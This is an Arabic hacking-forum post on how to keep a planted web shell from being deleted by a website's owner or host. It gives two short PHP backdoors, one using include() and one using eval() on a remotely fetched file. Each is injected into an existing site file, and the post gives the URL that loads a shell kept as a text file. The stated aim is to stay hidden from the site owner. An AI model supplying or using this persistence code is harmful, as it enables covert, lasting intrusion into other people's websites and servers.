حل مشكلة حذف الشل من صاحب الموقع
السلام عليكم ورحمة الله وبركاته ..
كيفكم ياحلوين ان شاء الله تمام ..
أحيانا يتم رفع الشل ولكن تجيه ثاني يوم تحصله محذوف سواء من صاحب الموقع أو صاحب السيرفر
ايش الحل ؟؟؟ نبي نرفع شل ونضمن بقاءه أطول فترة ممكنة بدون لفت نظر صاحب الموقع أو السيرفر..
الحل هو :
حقن كود بأحد ملفات الموقع [ ملاحظة : أنا قلت حقن مو تحذف كود الملف يعني مجرد اضافة للكود ]
هذا الكود معروف وهو يسبب ثغرة فايل انكلود للسيرفر ... بعد كذا تقوم بسحب الشل بصيغة txt
وهذا شي واضح للكل ...
للاصدار الرابع php 4
للاصدار الخامس php 5
ملاحظة تأكد أولا من اصدار php واستعمل الكود المناسب ...
بالنسبة للاصدار الخامس نفرض وضعنا الكود في ملف وليكن اسمه sad.php
طريقة السحب كالتالي :
اتمنى تكون الطريقة هذى مفيدة لحل لمشاكل حذف الشل ...
كيفكم ياحلوين ان شاء الله تمام ..
أحيانا يتم رفع الشل ولكن تجيه ثاني يوم تحصله محذوف سواء من صاحب الموقع أو صاحب السيرفر
ايش الحل ؟؟؟ نبي نرفع شل ونضمن بقاءه أطول فترة ممكنة بدون لفت نظر صاحب الموقع أو السيرفر..
الحل هو :
حقن كود بأحد ملفات الموقع [ ملاحظة : أنا قلت حقن مو تحذف كود الملف يعني مجرد اضافة للكود ]
هذا الكود معروف وهو يسبب ثغرة فايل انكلود للسيرفر ... بعد كذا تقوم بسحب الشل بصيغة txt
وهذا شي واضح للكل ...
للاصدار الرابع php 4
PHP:
<?php
$RxH = $_GET['bullet'];
include ($RxH);
?>للاصدار الخامس php 5
PHP:
<?php
if($_GET[bullet]){
$file=implode("\n",file($_GET[bullet]));
$bullet=str_replace("<?php", "",$file);
$bullet=str_replace("<?", "",$bullet);
$bullet=str_replace("?>", "",$bullet);
eval($bullet);
}
?>ملاحظة تأكد أولا من اصدار php واستعمل الكود المناسب ...
بالنسبة للاصدار الخامس نفرض وضعنا الكود في ملف وليكن اسمه sad.php
طريقة السحب كالتالي :
PHP:
www.site.com/sad.php?bullet=shell.txt?اتمنى تكون الطريقة هذى مفيدة لحل لمشاكل حذف الشل ...
اسم الموضوع : حل مشكلة حذف الشل من صاحب الموقع
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات